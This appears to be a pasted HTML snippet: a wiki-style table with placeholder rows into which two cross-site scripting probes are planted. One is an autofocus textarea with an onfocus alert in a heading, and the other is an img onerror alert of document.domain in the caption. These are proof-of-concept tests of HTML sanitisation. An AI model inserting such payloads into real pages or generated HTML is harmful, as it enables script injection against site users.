Untitled
3 weeks ago in Plain Text
<!DOCTYPE html>
<html>
<body>
<h1> TABLE </h1>
<table class="wikitable">
<h2> aa <textarea autofocus onfocus=alert(1)> </h2>
<caption> caption <h1><img src=x onerror=alert(document.domain);//</h1></caption>
<tr>
<th> Company </th>
<th> Contact </th>
<th> Country </th>
</tr>
<tr>
<td> A </td>
<td> Aa </td>
<td> AAa </td>
</tr>
</table>
</body>
</html>